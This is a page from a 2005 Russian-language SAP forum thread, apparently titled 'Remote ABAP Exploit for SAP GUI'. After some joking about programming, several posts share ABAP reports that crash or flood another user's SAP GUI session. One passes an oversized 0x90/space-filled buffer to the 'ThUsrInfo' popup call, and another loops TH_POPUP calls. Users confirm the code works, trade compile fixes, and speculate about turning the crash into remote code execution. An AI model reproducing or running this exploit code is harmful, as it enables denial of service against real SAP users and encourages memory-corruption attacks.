Текущее время: Пт, авг 01 2025, 14:42

Часовой пояс: UTC + 3 часа


Правила форума


ВНИМАНИЕ!

Вопросы по SAP Query и Quick View - сюда



Начать новую тему Ответить на тему  [ Сообщений: 68 ]  На страницу Пред.  1, 2, 3, 4, 5  След.
Автор Сообщение
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:20 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Skif написал:
"..было время и цены снижались.."


И текли, куда надо, каналы
И в конце куда надо впадали....

В.С. Высоцкий "Баллада о трудном детстве"
http://www.kulichki.com/vv/pesni/chas-zachatya-ya-pomnyu.html

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:27 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
vvvictor написал:
Zharik написал(а):
Если ты программер - да. :lol: :lol: :lol:

Если кодер - то просто придерживаться принципов оптимального кодирования :lol: :lol: :lol:

Иногда приходится в такие места залезать :!: :evil: :twisted: :twisted:

А творчество, в нашем деле, должно быть востребованно, оправданно и максимально безопасно. Это на руки можно надеть презерватив ответственности, а вот тем - из-за кого приходится лезть в дебри и не всегда безопасно - такой презик на мозги не натянешь :cry: :oops: :lol: :lol: :lol:

не так
отвественность/творчество
админ 90/10
пр-ст 10/90
(c)Skif
Но это больше для собеседования - чтобы максимизировать выработку впоследствии


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:29 
Менеджер
Менеджер
Аватара пользователя

Зарегистрирован:
Чт, май 26 2005, 11:36
Сообщения: 651
Откуда: Киев-Москва
Цитата:
Но это больше для собеседования - чтобы максимизировать выработку впоследствии

Немножко не понял к чему собеседование.

_________________
Рисую потоки данных.


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:31 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Skif написал:

отвественность/творчество
админ 90/10
пр-ст 10/90
(c)Skif
Но это больше для собеседования - чтобы максимизировать выработку впоследствии


100%

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:37 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
Zharik написал(а):
Цитата:
Но это больше для собеседования - чтобы максимизировать выработку впоследствии

Немножко не понял к чему собеседование.

Потому что абап и админство (вспомнилось гоблинский властелин))) - в порядке хобби - негоже старикам у молодёжи хлеб отнимать. А "собеседование" (не путать с рекрутёрским) - ну должность такая - текучка большая однако.
вот ещё один копирайт могу подарить:
Нет сегодняшних проблем - есть вчерашние ошибки" (на стене висит)


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 11 2005, 11:46 
Председатель
Председатель
Аватара пользователя

Зарегистрирован:
Пн, сен 06 2004, 11:43
Сообщения: 1551
Пол: Мужской
Skif написал:
вот ещё один копирайт могу подарить:
Нет сегодняшних проблем - есть вчерашние ошибки" (на стене висит)

50/50, хотя в принципе все так
:lol:

_________________
Ex ipso fonte bibere
Цитата:
Abyssus abyssum invocat
Dies diem docet
Ducunt volentem fata, nolentem trahunt

Estote prudentes sicut serpentes


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Вт, окт 18 2005, 14:57 
Старший специалист
Старший специалист

Зарегистрирован:
Пт, ноя 12 2004, 10:44
Сообщения: 370
Откуда: Москва
Интересная оказывается тема, если копать проблему дальше. Жаль нет дебаггера, но кажется тут дело идет до Remote Code Execution. :twisted: С успехом можно попробовать сорвать стек и выполнить на удаленной машине все, что захочется :) в поле user добавил obligatory умышленно, ибо если запустить с пустым полем действует как оружие массового опорожнения. :D Гуя в предсмертных судорогах пытается написать создателю (@sap.com) о случившемся :)

Code:
report z_gui_exploit.

include tskhincl.

parameters client like sy-mandt default sy-mandt.
parameters user like sy-uname obligatory default sy-uname.

data message(2048).
data xmes(2048) type x.
data message_len type sy-index.
data loc_cut_blanks type sy-langu value 0.
field-symbols <mes> type c.

start-of-selection.
  message_len = 2048.

  xmes(1) = '90'.
  clear xmes with xmes(1).
  assign xmes to <mes> casting type c.

  call 'ThUsrInfo'
    id 'OPCODE' field opcode_send_pop_up
    id 'CLIENT' field client
    id 'USR' field user
    id 'MSG' field <mes>
    id 'MSG_LEN' field message_len
    id 'CUT_BLANKS' field loc_cut_blanks.


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения: Re: Remote ABAP Exploit для SAP GUI
СообщениеДобавлено: Ср, окт 19 2005, 15:05 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
holocron написал(а):
не помню, публиковал или нет, но вот сей код вышибает режим у пользователя без предупреждений :) проверено на 4.6с + GUI up to 6.20. Иногда атакуемая машинка пищит :)

Code:
report z_gui_exploit.

parameters uname type sy-uname obligatory.
parameters text type sm04dic-popupmsg.
parameters times type i default 50.
parameters mandt type sy-mandt default sy-mandt.

start-of-selection.
  do times times.
  call function 'TH_POPUP'
    exporting
      client = mandt
      user = uname
      message = text
    exceptions                                                             
      user_not_found = 1
      others = 2.
  enddo.

нифига не валит (( Открывается 3-5 окошек и всё...(40b)


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 15:18 
Старший специалист
Старший специалист
Аватара пользователя

Зарегистрирован:
Вт, авг 17 2004, 08:55
Сообщения: 331
Откуда: Украина, г.Мариуполь
Пол: Мужской
Зато код холокорна сработал на "ура!", только вместо
Code:
data xmes(2048) type x.
пришлось написать просто
Code:
data xmes(2048).

Иначе не компилировалось.


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 15:21 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
RoadRunner написал:
Зато код холокорна сработал на "ура!", только вместо
Code:
data xmes(2048) type x.
пришлось написать просто
Code:
data xmes(2048).

Иначе не компилировалось.
]
пробуем..))


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 15:28 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
RoadRunner написал:
Зато код холокорна сработал на "ура!", только вместо
Code:
data xmes(2048) type x.
пришлось написать просто
Code:
data xmes(2048).

Иначе не компилировалось.

"CASTING" is not expected. (( 40b старушка...


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 16:30 
Гость
раз так.. в качестве параметра скорми функции не <mes>, а пустую строку длинной 2048. :)


Принять этот ответ
Вернуться к началу
  
 
 Заголовок сообщения:
СообщениеДобавлено: Ср, окт 19 2005, 17:18 
Почетный гуру
Почетный гуру
Аватара пользователя

Зарегистрирован:
Вт, авг 31 2004, 14:57
Сообщения: 5258
Откуда: Ростов невеликий
Пол: Мужской
holocrоn написал(а):
раз так.. в качестве параметра скорми функции не <mes>, а пустую строку длинной 2048. :)

вот млин, начальник транспортного цеха ушёл уже... (админ транспорта))


Принять этот ответ
Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Чт, окт 20 2005, 10:02 
Гость
Skif написал:
holocrоn написал(а):
раз так.. в качестве параметра скорми функции не <mes>, а пустую строку длинной 2048. :)

вот млин, начальник транспортного цеха ушёл уже... (админ транспорта))

всё ок. валит. )) впишу в заголовок автора ))


Принять этот ответ
Вернуться к началу
  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт, окт 21 2005, 08:40 
Гость
польщен )) Однако... написание полноценного эксплоита мне не под силу (полномочий нет :( ) Как вы понимаете дыркой можно пользоваться и без АБАПа. вот только без SoftICE сложно сказать, возможен ли Remote Execution или нет. когда строку чар пустую подсовываешь - адрес падения 0х20202020 :) т.е. пробелами перезаписан. а значит, что есть вероятность успешной инъекции кода. :) просто DoS-атака - не спортивно :)

Если SAP - месть немцев за проигрыш в войне (как писали в соседнем треде), то это месть за дедушку :D


Принять этот ответ
Вернуться к началу
  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 68 ]  На страницу Пред.  1, 2, 3, 4, 5  След.

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: Google [Bot]


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Русская поддержка phpBB